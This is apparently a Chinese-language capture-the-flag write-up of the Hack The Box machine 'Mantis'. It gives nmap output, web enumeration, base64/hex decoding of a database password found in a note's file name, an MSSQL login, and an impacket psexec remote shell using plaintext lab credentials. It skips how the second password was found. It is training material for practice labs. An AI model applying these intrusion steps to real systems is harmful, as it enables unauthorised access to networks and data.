mantis(敏感信息泄露+445端口连接)

10.10.10.52

使用脚本扫描端口

1

cat 10.10.10.52.txt

2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
53/tcp    open   domain       Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp    open   kerberos-sec Microsoft Windows Kerberos (server time: 2020-01-17 11:19:45Z)
139/tcp   open   netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open   ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open   microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp   open   kpasswd5?
593/tcp   open   ncacn_http   Microsoft Windows RPC over HTTP 1.0
1337/tcp  open   http         Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
1433/tcp  open   ms-sql-s     Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info:
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: MANTIS
|   DNS_Domain_Name: htb.local
|   DNS_Computer_Name: mantis.htb.local
|   DNS_Tree_Name: htb.local
|_  Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2020-01-17T09:04:27
|_Not valid after:  2050-01-17T09:04:27
|_ssl-date: 2020-01-17T11:20:51+00:00; +31s from scanner time.
3268/tcp  open   ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
8080/tcp  open   http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Tossed Salad - Blog
9389/tcp  open   mc-nmf       .NET Message Framing
47001/tcp open   http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49157/tcp open   ncacn_http   Microsoft Windows RPC over HTTP 1.0
50255/tcp open   ms-sql-s     Microsoft SQL Server 2014 12.00.2000
| ms-sql-ntlm-info:
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: MANTIS
|   DNS_Domain_Name: htb.local
|   DNS_Computer_Name: mantis.htb.local
|   DNS_Tree_Name: htb.local
|_  Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2020-01-17T09:04:27
|_Not valid after:  2050-01-17T09:04:27
|_ssl-date: 2020-01-17T11:20:51+00:00; +31s from scanner time.
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 43m22s, deviation: 1h53m23s, median: 30s
| ms-sql-info:
|   10.10.10.52:1433:
|     Version:
|       name: Microsoft SQL Server 2014 RTM
|       number: 12.00.2000.00
|       Product: Microsoft SQL Server 2014
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-os-discovery:
|   OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: mantis
|   NetBIOS computer name: MANTIS\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: mantis.htb.local
|_  System time: 2020-01-17T06:20:42-05:00
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-01-17T11:20:43
|_  start_date: 2020-01-17T09:04:01

操作系统: 445端口 Windows Server 2008 R2 Standard 7601 Service

web

使用脚本扫描web目录

1
2
3
http://10.10.10.52:1337/
http://10.10.10.52:593
http://10.10.10.52:8080/Users/Account/LogOn?ReturnUrl=%2F

5

http://10.10.10.52:1337/secure_notes 6 http://10.10.10.52:1337/secure_notes/dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt

7 从文件内容可以得知用户名、数据库名

文件名包含一串密文NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx

echo -n NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx | base64 -d

将其base64解码以后,得到6d2424716c5f53405f504073735730726421

echo -n 6d2424716c5f53405f504073735730726421 | wc -c 查看密文的长度,是36位。如果密文长度是32位,说明可能是MD5加密。

echo -n 6d2424716c5f53405f504073735730726421 | xxd -ps -r将其16进制解码就可以得到我们的密码m$$ql_S@_P@ssW0rd!

十六进制与xxd

xxd是十六进制转储工具

使用方法:xxd 文件名

8

连接数据库

dbeaver 是一个通用数据库,使用该客户端,连接目标机器的数据库。

注意之前的扫描结果,mssql版本: Microsoft SQL Server 2014 12.00.2000 9

1
2
3
4
地址:10.10.10.52
数据库名:orcharddb
用户名: admin
密码:m$$ql_S@_P@ssW0rd!

下载驱动,然后点测试连接。 10

11

1
2
3
locate psexec.py
python /usr/share/doc/python-impacket/examples/psexec.py htb.local/James@10.10.10.52 cmd.exe
J@m3s_P@ssW0rd!

psexec 是一个类似于telnet的连接软件,通过psexec连接445端口。 12

1
2
3
cd C:\users\Adminitrator
cd C:\users\Administrator\Desktop
type root.txt

总结

  • 学习了psexec的用法
  • 一条命令,关闭进程pgrep openvpn | xargs kill -s 9
  • msf 有psexec模块,可以输入明文密码,也可以输入hash作为密码。